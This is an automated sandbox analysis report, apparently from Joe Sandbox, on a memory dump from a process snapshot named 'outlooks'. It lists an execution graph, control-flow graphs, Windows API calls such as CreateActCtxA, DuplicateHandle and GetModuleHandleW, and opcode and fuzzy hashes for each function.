                                                                            execution_graph 16295 16d4668 16296 16d4669 16295->16296 16301 16d6de0 16296->16301 16299 16d4704 16302 16d6e05 16301->16302 16310 16d6edf 16302->16310 16314 16d6ef0 16302->16314 16303 16d46e9 16306 16d421c 16303->16306 16307 16d4227 16306->16307 16322 16d8560 16307->16322 16309 16d8806 16309->16299 16312 16d6ee4 16310->16312 16311 16d6ff4 16311->16311 16312->16311 16318 16d6414 16312->16318 16316 16d6ef1 16314->16316 16315 16d6ff4 16316->16315 16317 16d6414 CreateActCtxA 16316->16317 16317->16315 16319 16d7370 CreateActCtxA 16318->16319 16321 16d7433 16319->16321 16323 16d856b 16322->16323 16326 16d8580 16323->16326 16325 16d88dd 16325->16309 16327 16d858b 16326->16327 16330 16d85b0 16327->16330 16329 16d89ba 16329->16325 16331 16d85bb 16330->16331 16334 16d85e0 16331->16334 16333 16d8aad 16333->16329 16336 16d85eb 16334->16336 16335 16d9ed1 16335->16333 16336->16335 16341 16de0dd 16336->16341 16345 16ddf70 16336->16345 16356 16ddf60 16336->16356 16367 16de08e 16336->16367 16342 16de045 16341->16342 16342->16335 16342->16341 16343 16de166 16342->16343 16371 16dc464 16342->16371 16343->16335 16347 16ddf91 16345->16347 16346 16ddfb5 16346->16335 16347->16346 16348 16de045 16347->16348 16351 16de0dd KiUserCallbackDispatcher 16347->16351 16352 16de08e KiUserCallbackDispatcher 16347->16352 16354 16ddf60 KiUserCallbackDispatcher 16347->16354 16355 16ddf70 KiUserCallbackDispatcher 16347->16355 16385 16de120 16347->16385 16348->16335 16349 16de166 16348->16349 16350 16dc464 KiUserCallbackDispatcher 16348->16350 16349->16335 16350->16349 16351->16348 16352->16348 16354->16348 16355->16348 16358 16ddf64 16356->16358 16357 16ddfb5 16357->16335 16358->16357 16359 16de045 16358->16359 16362 16de0dd KiUserCallbackDispatcher 16358->16362 16363 16de08e KiUserCallbackDispatcher 16358->16363 16364 16de120 KiUserCallbackDispatcher 16358->16364 16365 16ddf60 KiUserCallbackDispatcher 16358->16365 16366 16ddf70 KiUserCallbackDispatcher 16358->16366 16359->16335 16360 16de166 16359->16360 16361 16dc464 KiUserCallbackDispatcher 16359->16361 16360->16335 16361->16360 16362->16359 16363->16359 16364->16359 16365->16359 16366->16359 16368 16de045 16367->16368 16368->16335 16369 16de166 16368->16369 16370 16dc464 KiUserCallbackDispatcher 16368->16370 16369->16335 16370->16369 16372 16dc469 16371->16372 16374 16de1ff 16372->16374 16375 16dc498 16372->16375 16376 16dc4a3 16375->16376 16377 16d85e0 KiUserCallbackDispatcher 16376->16377 16378 16de247 16377->16378 16381 16de2c0 16378->16381 16379 16de256 16379->16372 16382 16de2ee 16381->16382 16383 16de3ba KiUserCallbackDispatcher 16382->16383 16384 16de3bf 16382->16384 16383->16384 16386 16de121 16385->16386 16387 16de166 16386->16387 16388 16dc464 KiUserCallbackDispatcher 16386->16388 16387->16348 16388->16387 16389 16dbf08 16393 16dc000 16389->16393 16403 16dbff0 16389->16403 16390 16dbf17 16394 16dc005 16393->16394 16397 16dc034 16394->16397 16413 16daf60 16394->16413 16397->16390 16398 16dc238 GetModuleHandleW 16400 16dc265 16398->16400 16399 16dc02c 16399->16397 16399->16398 16400->16390 16404 16dc000 16403->16404 16405 16daf60 GetModuleHandleW 16404->16405 16407 16dc034 16404->16407 16406 16dc01c 16405->16406 16406->16407 16411 16dc689 GetModuleHandleW 16406->16411 16412 16dc698 GetModuleHandleW 16406->16412 16407->16390 16408 16dc238 GetModuleHandleW 16410 16dc265 16408->16410 16409 16dc02c 16409->16407 16409->16408 16410->16390 16411->16409 16412->16409 16414 16dc1f0 GetModuleHandleW 16413->16414 16416 16dc01c 16414->16416 16416->16397 16417 16dc689 16416->16417 16421 16dc698 16416->16421 16418 16dc694 16417->16418 16419 16daf60 GetModuleHandleW 16418->16419 16420 16dc6ac 16419->16420 16420->16399 16422 16dc699 16421->16422 16423 16daf60 GetModuleHandleW 16422->16423 16424 16dc6ac 16423->16424 16424->16399 16425 16d6540 16426 16d6545 16425->16426 16430 16d670f 16426->16430 16436 16d6720 16426->16436 16427 16d6673 16431 16d6787 DuplicateHandle 16430->16431 16432 16d6713 16430->16432 16434 16d681e 16431->16434 16440 16d611c 16432->16440 16434->16427 16437 16d6721 16436->16437 16438 16d611c DuplicateHandle 16437->16438 16439 16d674e 16438->16439 16439->16427 16441 16d6788 DuplicateHandle 16440->16441 16442 16d674e 16441->16442 16442->16427

                                                                            Executed Functions

                                                                            Function 016D7364 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 16d7364-16d7431 CreateActCtxA 2 16d743a-16d7494 0->2 3 16d7433-16d7439 0->3 10 16d7496-16d7499 2->10 11 16d74a3-16d74a7 2->11 3->2 10->11 12 16d74a9-16d74b5 11->12 13 16d74b8 11->13 12->13 15 16d74b9 13->15 15->15
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 016D7421
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000023.00000002.1685762252.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_35_2_16d0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID: U
                                                                            • API String ID: 2289755597-3372436214
                                                                            • Opcode ID: 7b1dea964afc4af587b63de3ebf20964b26f45756e1dbdb539d9a30fdc92e3b9
                                                                            • Instruction ID: 2ecb8da425308a736adf81798863c607619c34e93502fbf0ce90dc488c403aa0
                                                                            • Opcode Fuzzy Hash: 7b1dea964afc4af587b63de3ebf20964b26f45756e1dbdb539d9a30fdc92e3b9
                                                                            • Instruction Fuzzy Hash: F241E370C01728CFEB25CFA9C844BDEBBB5BF48704F20806AD409AB251DB755946CF91
                                                                            Function 016DC000 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 16 16dc000-16dc00f 18 16dc03b-16dc03f 16->18 19 16dc011-16dc01e call 16daf60 16->19 20 16dc041-16dc04b 18->20 21 16dc053-16dc094 18->21 24 16dc034 19->24 25 16dc020 19->25 20->21 28 16dc096-16dc09e 21->28 29 16dc0a1-16dc0af 21->29 24->18 74 16dc026 call 16dc689 25->74 75 16dc026 call 16dc698 25->75 28->29 31 16dc0b1-16dc0b6 29->31 32 16dc0d3-16dc0d5 29->32 30 16dc02c-16dc02e 30->24 35 16dc170-16dc1ed 30->35 33 16dc0b8-16dc0bf call 16daf6c 31->33 34 16dc0c1 31->34 36 16dc0d8-16dc0df 32->36 38 16dc0c3-16dc0d1 33->38 34->38 67 16dc1f5-16dc230 35->67 68 16dc1f0-16dc1f4 35->68 39 16dc0ec-16dc0f3 36->39 40 16dc0e1-16dc0e9 36->40 38->36 42 16dc0f5-16dc0fd 39->42 43 16dc100-16dc109 call 16daf7c 39->43 40->39 42->43 48 16dc10b-16dc113 43->48 49 16dc116-16dc11b 43->49 48->49 51 16dc11d-16dc124 49->51 52 16dc139-16dc146 49->52 51->52 53 16dc126-16dc136 call 16daf8c call 16daf9c 51->53 58 16dc169-16dc16f 52->58 59 16dc148-16dc166 52->59 53->52 59->58 69 16dc238-16dc263 GetModuleHandleW 67->69 70 16dc232-16dc235 67->70 68->67 71 16dc26c-16dc280 69->71 72 16dc265-16dc26b 69->72 70->69 72->71 74->30 75->30
                                                                            Memory Dump Source
                                                                            • Source File: 00000023.00000002.1685762252.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_35_2_16d0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 56981e664ba60d67a28c623d7fd9464dcb344710c34303fd604bebf672dd89f3
                                                                            • Instruction ID: d612b8f2df53c11e6cdf7899554ebd479a9850a87009c1528c8102e8222cfb41
                                                                            • Opcode Fuzzy Hash: 56981e664ba60d67a28c623d7fd9464dcb344710c34303fd604bebf672dd89f3
                                                                            • Instruction Fuzzy Hash: C27157B0A00B099FE724DF6AC84075ABBF6FF88600F00896DD44AD7B40DB75E846CB91
                                                                            Function 016D670F Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 76 16d670f-16d6711 77 16d6787-16d681c DuplicateHandle 76->77 78 16d6713-16d671a 76->78 81 16d681e-16d6824 77->81 82 16d6825-16d6842 77->82 79 16d671c-16d6720 78->79 80 16d6721-16d6749 call 16d611c 78->80 79->80 87 16d674e-16d6774 80->87 81->82
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016D674E,?,?,?,?,?), ref: 016D680F
                                                                            Memory Dump Source
                                                                            • Source File: 00000023.00000002.1685762252.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_35_2_16d0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 40d88636be4cb3f3231b85e57a0de8bbe808a62d7648c6151181ebb1229e07d0
                                                                            • Instruction ID: 8c2d3afc4abffddb310b0e74941d2187e05eceeff110a28fa9726b9d57f2f021
                                                                            • Opcode Fuzzy Hash: 40d88636be4cb3f3231b85e57a0de8bbe808a62d7648c6151181ebb1229e07d0
                                                                            • Instruction Fuzzy Hash: 0C413C76900248AFDF11CF99D844AEEBFF5FB48310F15805AE914A7311D7359911DFA0
                                                                            Function 016D6414 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 90 16d6414-16d7431 CreateActCtxA 93 16d743a-16d7494 90->93 94 16d7433-16d7439 90->94 101 16d7496-16d7499 93->101 102 16d74a3-16d74a7 93->102 94->93 101->102 103 16d74a9-16d74b5 102->103 104 16d74b8 102->104 103->104 106 16d74b9 104->106 106->106
                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 016D7421
                                                                            Memory Dump Source
                                                                            • Source File: 00000023.00000002.1685762252.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_35_2_16d0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 82ab7fc1c5677e74c3df4b8ee633521df8a177c9a3084500d66a04df4c99e430
                                                                            • Instruction ID: b6ea8672a16cd8501ba761ebd37e540e447babe34b626990feeb856554bbfa02
                                                                            • Opcode Fuzzy Hash: 82ab7fc1c5677e74c3df4b8ee633521df8a177c9a3084500d66a04df4c99e430
                                                                            • Instruction Fuzzy Hash: 0D41C270C01719CFEB25DFAAC844B9EBBB5BF48704F20806AD409AB251DB756946CF91
                                                                            Function 016D6780 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 107 16d6780-16d6783 109 16d6788-16d681c DuplicateHandle 107->109 110 16d681e-16d6824 109->110 111 16d6825-16d6842 109->111 110->111
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016D674E,?,?,?,?,?), ref: 016D680F
                                                                            Memory Dump Source
                                                                            • Source File: 00000023.00000002.1685762252.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_35_2_16d0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: cc23b051602a9a2d77377add24e18662f283b327ab260d2a058db213f029056a
                                                                            • Instruction ID: 19d91cae0f51cdaf8fa0e12dc12085802f926a79686852c9bb0731cb08814e1d
                                                                            • Opcode Fuzzy Hash: cc23b051602a9a2d77377add24e18662f283b327ab260d2a058db213f029056a
                                                                            • Instruction Fuzzy Hash: 7E21E4B59002489FDB10CFAAD884AEEBBF4EB48220F15805AE818A3351D778A940CF65
                                                                            Function 016D611C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 114 16d611c-16d681c DuplicateHandle 116 16d681e-16d6824 114->116 117 16d6825-16d6842 114->117 116->117
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016D674E,?,?,?,?,?), ref: 016D680F
                                                                            Memory Dump Source
                                                                            • Source File: 00000023.00000002.1685762252.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_35_2_16d0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 633022bff8eef9abb6b3fd7e68a2a6921a5f0bb4ca4a88ba3305a2e7e077c05b
                                                                            • Instruction ID: 52ac3d5f9bcb79b65a0bd364a182dbcdced0327c7a26818f8a531b04a327a0c9
                                                                            • Opcode Fuzzy Hash: 633022bff8eef9abb6b3fd7e68a2a6921a5f0bb4ca4a88ba3305a2e7e077c05b
                                                                            • Instruction Fuzzy Hash: 7721B7B5D00248DFDB10CF9AD884ADEBBF5EB48310F14841AE914A7350D378A954CFA5
                                                                            Function 016DAF60 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 120 16daf60-16dc230 123 16dc238-16dc263 GetModuleHandleW 120->123 124 16dc232-16dc235 120->124 125 16dc26c-16dc280 123->125 126 16dc265-16dc26b 123->126 124->123 126->125
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,016DC01C), ref: 016DC256
                                                                            Memory Dump Source
                                                                            • Source File: 00000023.00000002.1685762252.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_35_2_16d0000_outlooks.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: dc843b8517c3cd29b62971a18c2db2c0bfdadf9d2d98c53ab99ec0d9445156e9
                                                                            • Instruction ID: 6dd3e002524c49b79095a6381751fd6580bb8cdaca9fd6d272f37bf29b5f94ce
                                                                            • Opcode Fuzzy Hash: dc843b8517c3cd29b62971a18c2db2c0bfdadf9d2d98c53ab99ec0d9445156e9
                                                                            • Instruction Fuzzy Hash: 4911F0B5C006498FDB14DF9AC844B9EFBF5EB88220F10856AD919A7200C379A545CFA5